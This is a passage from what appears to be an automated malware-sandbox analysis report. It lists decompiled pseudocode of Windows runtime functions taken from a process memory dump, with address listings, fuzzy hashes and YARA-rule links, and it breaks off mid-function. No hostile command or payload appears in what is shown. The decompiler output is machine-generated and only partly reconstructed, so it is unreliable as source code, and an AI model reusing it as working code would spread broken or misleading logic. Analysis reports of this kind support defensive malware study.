						E0362FFB0(_t41, _t51, 0x3708608);
						L2:
						 *0x370b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0365B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E03632280(_t28, 0x3708608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0362FFB0(_t42, _t53, 0x3708608);
							if(_t53 != 0) {
								L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0362FFB0(_t41, _t51, 0x3708608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x03654a2c
0x03654a34
0x03654a3c
0x03654a3e
0x03654a48
0x03654a4b
0x03654a4d
0x03654a51
0x03654a9c
0x00000000
0x00000000
0x03654aa3
0x03654aa8
0x03654aad
0x03654ab1
0x03654ade
0x03654ae3
0x03654a5a
0x03654a62
0x03654a6a
0x03654a6e
0x0368f203
0x03654a84
0x03654a88
0x03654a89
0x03654a8a
0x03654a95
0x03654a95
0x03654a79
0x03654a80
0x03654af2
0x03654af4
0x03654af9
0x03654aff
0x03654b01
0x03654b03
0x03654b08
0x0368f20a
0x0368f212
0x0368f216
0x0368f216
0x03654b08
0x03654b13
0x03654b1a
0x0368f229
0x0368f229
0x03654b1a
0x03654a82
0x00000000
0x03654a82
0x03654ab7
0x03654acd
0x03654acd
0x03654ad5
0x03654ada
0x00000000
0x03654ada
0x03654ac2
0x03654acb
0x00000000
0x00000000
0x00000000
0x03654acb
0x03654a53
0x03654a53
0x03654a58
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4b253aaeb5e594911bb9888c7579ae55c9324a37d0e18e0166bc140d0d19bcd
Instruction ID: 5ba5d28e146eb7a181202c278f36e9f638771e320cf7604879e24cee4fd0c4a8
Opcode Fuzzy Hash: b4b253aaeb5e594911bb9888c7579ae55c9324a37d0e18e0166bc140d0d19bcd
Instruction Fuzzy Hash: 14312332205754DFC762EF55CA41B2ABBE4FB85B00F0545B9FC664B245CBB0D880CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 03658EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E03658EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x370d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E03644E70(0x37086e4, 0x3659490, 0, 0);
					if( *0x37053e8 > 5 && E03658F33(0x37053e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x37053e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x37053e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x35fbc46;
						_t48 = E03697B9C(0x37053e8, 0x35fbc46, _t67, 0x37053e8, _t70,  &_v140);
					}
				}
				return E0365B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x03658ec7
0x03658ed9
0x03658edc
0x03658ee6
0x03658ee9
0x03658eee
0x03658efc
0x03658f08
0x03691349
0x03691353
0x0369135d
0x03691366
0x0369136f
0x03691375
0x0369137c
0x03691385
0x03691390
0x03691391
0x0369139c
0x0369139d
0x036913a6
0x036913ac
0x036913b2
0x036913b5
0x036913bc
0x036913bf
0x036913c2
0x036913c5
0x036913c8
0x036913cb
0x036913ce
0x036913d1
0x036913d4
0x036913d7
0x036913da
0x036913dd
0x036913e0
0x036913e3
0x036913e6
0x036913e9
0x036913f6
0x03691400
0x03691400
0x03658f08
0x03658f32

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f17aa29dcd51671bed73596789a8ae020391f95622ba1c5a7fd17586af4cd027
Instruction ID: ebb633014db7ee952e1510faf7c14c92e9bff4d75a4fd2fd83138d21396c8d7e
Opcode Fuzzy Hash: f17aa29dcd51671bed73596789a8ae020391f95622ba1c5a7fd17586af4cd027
Instruction Fuzzy Hash: D941A1B1D00318DEDB20CFAAD981AADFBF8FB48314F5081AEE549A7640DB745A44CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0364E730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0364E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E03659670() < 0) {
					L0366DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x3707b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L03634620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0364E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x0364e730
0x0364e736
0x0364e738
0x0364e73d
0x0364e73e
0x0364e740
0x0364e749
0x0364e765
0x0364e76a
0x0364e76b
0x0364e76c
0x0364e76d
0x0364e76e
0x0364e76f
0x0364e775
0x0364e777
0x0364e77e
0x0368b675
0x0364e784
0x0364e784
0x0364e789
0x0364e7a8
0x0364e7ac
0x0364e807
0x0364e7ae
0x0364e7ae
0x0364e7b1
0x0364e7b4
0x0364e7b9
0x0364e7c0
0x0364e7c4
0x0364e7ca
0x0364e7cc
0x00000000
0x0364e7d3
0x0364e7d6
0x00000000
0x00000000
0x0364e7ff
0x0364e802
0x00000000
0x00000000
0x0364e7f9
0x0364e7fc
0x00000000
0x00000000
0x0364e7f3
0x0364e7f6
0x00000000
0x00000000
0x0364e7ed
0x0364e7f0
0x00000000
0x00000000
0x0364e7e7
0x0364e7ea
0x00000000
0x00000000
0x0368b685
0x0368b688
0x00000000
0x00000000
0x0368b682
0x00000000
0x00000000
0x0364e7cc
0x0364e7d9
0x0364e7dc
0x0364e7de
0x0364e7de
0x0364e7ac
0x0364e7e4
0x0364e74b
0x0364e751
0x0364e759
0x0364e761
0x0364e761

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a53516f22d11f041c244d98f311d44a62662c363845154ab23be13df38f25988
Instruction ID: 22ce54169426b0e3cb6ccf3234866b8eca1c566303262615f2e4899936d6aa1a
Opcode Fuzzy Hash: a53516f22d11f041c244d98f311d44a62662c363845154ab23be13df38f25988
Instruction Fuzzy Hash: 06318F75A14249EFD704CF58C944F9ABBE4FB09324F14825AF904CB341D631EC90CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0364BC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0364BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x3706100; // 0x1d
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E03632280(0xd, 0x1131f1a0);
				_t41 =  *0x37060f8; // 0x0
				if(_t41 != 0) {
					 *0x37060f8 =  *_t41;
					 *0x37060fc =  *0x37060fc + 0xffff;
				}
				E0362FFB0(_t41, 0x800, 0x1131f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x37060f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L03634620(0x3706100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x3706100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x0364bc36
0x0364bc42
0x0364bc45
0x0364bc4a
0x0364bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x0364bc50
0x0364bc50
0x0364bc58
0x0364bc5a
0x0364bc60
0x00000000
0x00000000
0x0368a4f2
0x0368a4f6
0x00000000
0x00000000
0x00000000
0x0368a4fc
0x0364bc79
0x0364bc7e
0x0364bc86
0x0364bd16
0x0364bd20
0x0364bd20
0x0364bc8d
0x0364bc94
0x0364bcbd
0x0364bcca
0x0364bccb
0x0364bccc
0x0364bccd
0x0364bcce
0x0364bcd4
0x0364bcea
0x0364bcee
0x0364bcf2
0x0364bd00
0x0364bd04
0x00000000
0x0364bc96
0x0364bcab
0x0364bcaf
0x0364bd2c
0x0364bd2c
0x0364bd09
0x00000000
0x0364bd09
0x0364bcb1
0x0364bcb5
0x0364bcbb
0x00000000
0x00000000
0x00000000
0x0364bcbb

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60f2a7ac68bd16469c11ee93d1bcd6f42011854d6b461d9dc3eac3903d09ef64
Instruction ID: 21baf157545db0c56019a5a18d44cd0bad17445032caa7285bf7e074282cde72
Opcode Fuzzy Hash: 60f2a7ac68bd16469c11ee93d1bcd6f42011854d6b461d9dc3eac3903d09ef64
Instruction Fuzzy Hash: B8310E36A00619DBDB01EF58D4C0BA673A4FF19314F1880B9ED84DB305EB78D9068B80

Uniqueness

Uniqueness Score: -1.00%

Function 03619100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E03619100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x36ef6e8);
				E0366D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E036E88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0366D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x37086c0; // 0x2bb07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x37086b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E03632280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E036E88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0365AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x370b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x37084c0;
										if(_t69 >=  *0x37084c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E036E9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0361922A(_t82);
							_t53 = E03637D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E036E8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x37086c0; // 0x2bb07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x37086b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x37086bc;
										_t72 = 0x37086b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E03619240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x37086c4;
									_t72 = 0x37086c0;
									L18:
									E03649B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x03619100
0x03619100
0x03619100
0x03619100
0x03619102
0x03619107
0x0361910c
0x03619110
0x03619115
0x03619136
0x03619143
0x036737e4
0x036737e4
0x03619149
0x0361914e
0x0361914e
0x03619117
0x0361911d
0x00000000
0x00000000
0x0361911f
0x03619125
0x00000000
0x03619151
0x03619158
0x0361915d
0x03619161
0x03619168
0x03673715
0x00000000
0x0361916e
0x0361916e
0x03619175
0x03619177
0x0361917e
0x0361917f
0x03619182
0x03619182
0x03619187
0x03619187
0x0361918a
0x0361918d
0x0361918f
0x03619192
0x03619195
0x03619198
0x03619198
0x03619198
0x0361919a
0x00000000
0x00000000
0x0367371f
0x03673721
0x03673727
0x0367372f
0x03673733
0x03673735
0x03673738
0x0367373b
0x0367373d
0x03673740
0x00000000
0x00000000
0x03673746
0x03673749
0x00000000
0x00000000
0x0367374f
0x03673751
0x00000000
0x00000000
0x03673757
0x03673759
0x0367375c
0x0367375c
0x0367375e
0x0367375e
0x03673761
0x03673764
0x00000000
0x00000000
0x03673766
0x03673768
0x036737a3
0x036737a3
0x036737a5
0x036737a7
0x036737ad
0x036737b0
0x036737b2
0x036737bc
0x036737c2
0x036737c2
0x036737b2
0x03619187
0x03619187
0x0361918a
0x0361918d
0x0361918f
0x03619192
0x03619195
0x00000000
0x03619195
0x00000000
0x03619187
0x0367376a
0x0367376a
0x0367376c
0x0367376c
0x0367376f
0x03673775
0x00000000
0x00000000
0x03673777
0x03673779
0x00000000
0x00000000
0x03673782
0x03673787
0x03673789
0x03673790
0x03673790
0x0367378b
0x0367378b
0x0367378b
0x03673792
0x03673795
0x03673795
0x03673798
0x03673798
0x0367379b
0x0367379b
0x036191a3
0x036191a9
0x036191b0
0x036191b4
0x036191b4
0x036191bb
0x036191c0
0x036191c5
0x036191c7
0x036737da
0x036191cd
0x036191cd
0x036191cd
0x036191d2
0x036191d5
0x03619239
0x03619239
0x036191d7
0x036191db
0x036191e1
0x036191e7
0x036191fd
0x03619203
0x0361921e
0x03619223
0x00000000
0x03619223
0x03619205
0x03619208
0x0361920c
0x03619214
0x03619214
0x036191e9
0x036191e9
0x036191ee
0x036191f3
0x036191f3
0x036191f3
0x036191e7
0x00000000
0x036191db
0x03619187
0x03619168

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5081221365c29d05744f8d5c2e650c5659d53436177f17f44b6bcb16db428c15
Instruction ID: ff1c08de0912544d3010b4f9570d85ff6854e01a6a029809fc0ea0699309c6fc
Opcode Fuzzy Hash: 5081221365c29d05744f8d5c2e650c5659d53436177f17f44b6bcb16db428c15
Instruction Fuzzy Hash: 9231D079A01388DFDB61DB68C699BACFBF1BB49314F2D8199C4046B341C334A9D0CB96

Uniqueness

Uniqueness Score: -1.00%

Function 03641DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E03641DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0363F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L03634620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0363F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x03641dc2
0x03641dc5
0x03641dc7
0x03641dcc
0x03641dce
0x03641dd6
0x03641ddf
0x03641de0
0x03641de1
0x03641de5
0x03641de8
0x03641def
0x03641df0
0x03641df6
0x03641df7
0x03641dfe
0x03641e1a
0x00000000
0x00000000
0x03641e0b
0x03641e12
0x03641e12
0x03641e00
0x03641e00
0x03641e05
0x03641e1e
0x03641e23
0x0368570f
0x03685713
0x00000000
0x00000000
0x03685719
0x03685719
0x03641e2c
0x03641e2d
0x03641e2e
0x03641e2f
0x03641e31
0x03641e32
0x03641e35
0x03641e3d
0x03685723
0x0368573d
0x0368573d
0x00000000
0x03685723
0x03641e49
0x03641e4e
0x03641e4e
0x03641e09
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 59f6d56968fbf0da79283d9e3a55041fa940b0d832641b7db0d8cfe17540def9
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 4B21A17AA00219EFC721CF59CD80EABFBBDEF87640F154055E9059B220DA30AE41D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 03630050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E03630050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x370d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E03649ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0365B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E036E8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E03649702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x370b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x03630055
0x0363005d
0x03630062
0x0363006c
0x0363006f
0x03630074
0x0363007a
0x0363007a
0x03630080
0x03630080
0x03630087
0x0363008d
0x0363008f
0x03630093
0x03630095
0x0363009b
0x036300f8
0x036300fb
0x036300fc
0x036300ff
0x03630108
0x03630108
0x036300a2
0x036300a6
0x036300b3
0x036300bc
0x036300c5
0x036300ca
0x0367c01e
0x00000000
0x00000000
0x0367c02d
0x036300d5
